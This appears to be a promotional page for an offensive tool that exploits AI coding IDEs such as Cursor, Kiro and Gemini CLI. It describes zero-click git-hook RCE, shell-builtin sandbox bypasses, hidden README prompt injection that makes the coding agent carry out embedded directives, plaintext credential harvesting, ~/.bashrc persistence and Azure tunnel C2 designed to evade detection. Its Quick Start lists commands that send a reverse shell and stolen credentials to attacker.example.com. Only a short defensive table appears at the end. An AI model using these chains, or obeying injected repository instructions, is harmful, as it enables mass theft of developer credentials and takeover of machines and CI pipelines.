T138 — L27 AI CODING AGENT

Red Specter SPECTER CURSOR

The developer opened the repo. We owned the machine.

AI Coding IDE Exploitation Engine. Zero-click RCE via pre-commit hooks. Shell builtin sandbox bypass invisible to Cursor's allowlist. SQLite plaintext credential harvest — NO PATCH. 3-stage Azure tunnel C2. Kiro triple-CVE chain. Gemini CLI CI/CD takeover.

265
Tests
9.9
Max CVSS
8
Subsystems
5
IDE Targets
Read the Docs Back to NIGHTFALL

Overview

SPECTER CURSOR is NIGHTFALL's Layer 27 kill chain module — AI Coding Agent. It targets the trust developers place in AI coding tools: Cursor, Kiro, Antigravity, Gemini CLI, and Windsurf. Every subsystem exploits a distinct attack surface — from zero-click git hook injection through to full CI/CD pipeline takeover via a single PR.

The core insight: AI coding agents operate with elevated trust. They read project files, execute commands, connect to cloud services, and store credentials in plaintext SQLite databases. SPECTER CURSOR weaponises every dimension of that trust.

SPECTER CURSOR requires authorisation. INJECT gate: CURSOR_INJECT_KEY env var. UNLEASHED gate: CURSOR_UNLEASHED_KEY env var. All reports signed CUR-{hex12} with Ed25519.

Key CVEs

CVE-2026-26268 CVSS 9.9

Zero-click RCE via malicious pre-commit hook in embedded bare repo. Cursor AI agent triggers the hook during any agent-initiated commit. Fires with no user interaction. Fixed Cursor v2.5.

CVE-2026-22708 CVSS 8.5

Shell builtin sandbox bypass in Cursor Auto-Run Mode. export, typeset, and declare builtins are invisible to shouldBlockShellCommand. Stage 1 poisons env; Stage 2 fires via trusted command. Fixed v2.3.

CursorJacking CVSS 8.2 — NO PATCH

Cursor stores all API keys, session tokens, and cloud credentials in plaintext SQLite at state.vscdb. Any extension reads without permission prompt. Cursor declined to fix this in Feb 2026.

Kiro CVE-2026-0830 CVSS 9.1

GitLab MR helper passes workingDir to child_process.exec() unquoted. Folder name project;PAYLOAD# executes arbitrary commands. Fixed Kiro v0.6.18.

Antigravity Groundfall CVSS 9.3

find_by_name Pattern parameter → fd flag injection (--exec sh -c 'PAYLOAD' \;). Fires before security restrictions are evaluated. Bypasses Secure Mode entirely. Fixed Feb 2026.

GHSA-wpqr-6v78-jr5g (Gemini CLI) CVSS 10.0

CI/CD headless mode auto-trusts workspace config from PR branches. on_load shell fires with full runner credentials (GITHUB_TOKEN, AWS, Anthropic). Fixed Gemini CLI v0.39.1.

Subsystems

ENUM-IDES OPEN

Enumerate installed AI coding IDEs. Detect Cursor, Kiro, Antigravity, Gemini CLI, Windsurf. Version-to-CVE matching. Auto-run mode detection. Extension inventory. SQLite DB path discovery. specter-cursor enum-ides

GIT-HOOK-RCE UNLEASHED

CVE-2026-26268 zero-click pre-commit hook delivery. Embeds malicious bare repo inside legitimate project. Fires on any agent-initiated commit. 3 payload types: reverse shell, credential harvest, SSH key injection. CVSS 9.9.

BUILTIN-BREAK INJECT

CVE-2026-22708 shell builtin sandbox bypass. 8 techniques: PYTHONPATH poison, GIT_SSH_COMMAND hijack, PATH shadow, function redefinition, GIT_PAGER, GIT_EDITOR, LD_PRELOAD, typeset zsh hook. All invisible to shouldBlockShellCommand.

NOMSHUB UNLEASHED

3-stage attack chain. Stage 1: README.md HTML comment prompt injection. Stage 2: shell builtin escape + ~/.bashrc persistence + state.vscdb credential harvest. Stage 3: cursor tunnel Azure relay C2 (*.rel.tunnels.api.visualstudio.com:443). Access via vscode.dev/tunnel/{name}.

CURSORJACKING INJECT

Plaintext SQLite credential harvest from state.vscdb. Direct DB copy-then-query. Malicious extension scaffold (onStartupFinished, hourly harvest). WARLORD routing: API keys→RAPTOR, GitHub→GHOST, AWS→CHARYBDIS, sessions→PARASITE. NO PATCH.

KIRO-CHAIN UNLEASHED

Triple-CVE Kiro attack chain. CVE-2026-0830: folder name command injection. CVE-2026-5429: XSS theme → Electron nodeIntegration RCE. CVE-2026-10591: .vscode/tasks.json auto-exec on folder open. All three delivered simultaneously.

ANTIGRAVITY UNLEASHED

Two attack chains. Groundfall: find_by_name fd flag injection CVSS 9.3. Gemini CLI CI: GHSA-wpqr-6v78-jr5g CVSS 10.0 — headless CI/CD auto-trust RCE, full runner credential harvest, WARLORD routing. .antigravity/config.json auto-delivery.

REPORT OPEN

Generate Ed25519-signed CUR-{hex12} reports. Full session findings, evidence files, WARLORD routing map, MITRE ATT&CK/ATLAS mapping, attack flow diagram, remediation guidance. JSON output with 600 file permissions.

NomShub Kill Chain

Three stages, zero user interaction. Works against Cursor v2.x and v3.x. Traffic blends into legitimate Azure Cursor telemetry.

1
README.md HTML Comment Injection
Adversarial instructions inside <!-- --> comments. Invisible to humans, visible to Cursor AI reading project context. LLM follows embedded workspace initialisation directives silently.
2
Shell Builtin Sandbox Escape
export HOME_CACHE=... and mkdir -p are shell builtins — invisible to shouldBlockShellCommand. Escape workspace scope, write ~/.bashrc persistence, harvest state.vscdb + SSH keys + env vars to C2.
3
Azure Relay Tunnel C2
cursor tunnel --accept-server-license-terms --name {name} launched via disown. Full VS Code shell access at https://vscode.dev/tunnel/{name}. Traffic: *.rel.tunnels.api.visualstudio.com:443 — indistinguishable from Cursor telemetry.

WARLORD Routing

Harvested credentials routed automatically to downstream NIGHTFALL tools for maximum blast radius.

Credential TypeWARLORD RouteAction
Anthropic / OpenAI API keysT134 SPECTER RAPTORValidate + blast radius scoring
GitHub OAuth tokensT122 SPECTER GHOSTNHI enumeration, org repo sweep
AWS / Azure credentialsT130 SPECTER CHARYBDISCloud identity chain, lateral movement
Cursor session tokensT131 SPECTER PARASITEInference pivot, session replay
JWT secrets (cracked)T124 SPECTER APEXOrchestrator pivot
SSH / GitHub keysT122 SPECTER GHOSTRepository access enumeration

WMD Classes

ai_ide_zero_click_rce coding_agent_credential_mass_harvest developer_sandbox_escape cicd_pipeline_takeover_via_agentic_ide enterprise_ide_fleet_compromise

WMD-class operations require the UNLEASHED gate. Enterprise fleet compromise: single malicious repo pushed to shared org → all developers who clone trigger CVE-2026-26268 → simultaneous credential harvest from entire engineering team → WARLORD routing to downstream tools. Expected yield: hundreds of API keys in <60 seconds.

Quick Start

pip install specter-cursor

# Enumerate installed IDEs and CVE exposure
specter-cursor enum-ides

# Deliver CVE-2026-26268 zero-click hook RCE (UNLEASHED)
export CURSOR_UNLEASHED_KEY="your-key"
specter-cursor git-hook-rce \
  --target /path/to/workspace \
  --c2-host attacker.example.com \
  --c2-port 4444 \
  --payload reverse_shell

# Run NomShub full chain
specter-cursor nomshub \
  --output-dir /tmp/nomshub \
  --c2 http://attacker.example.com:9090 \
  --tunnel-name cursor-workspace-sync

# CursorJacking SQLite harvest
export CURSOR_INJECT_KEY="your-key"
specter-cursor cursorjacking \
  --method both \
  --c2 http://attacker.example.com:9090

# Generate signed report
specter-cursor report

Defensive Pairing

SPECTER CURSOR's attack surface is addressed by multiple AI Shield modules:

AttackDefensive Module
Git hook RCE (CVE-2026-26268)M156 KNOWLEDGE INFRASTRUCTURE SENTINEL — git hook monitoring
SQLite credential exposure (CursorJacking)M148 AGENT PERSISTENCE SENTINEL — file access monitoring
Azure tunnel C2 (NomShub Stage 3)M149 AI ORCHESTRATION GUARD — egress analysis
Shell builtin bypass (CVE-2026-22708)M150 INFERENCE GATEWAY SENTINEL — process lineage
CI/CD pipeline takeover (GHSA-wpqr)M155 SOC AI INTEGRITY MONITOR — CI runner monitoring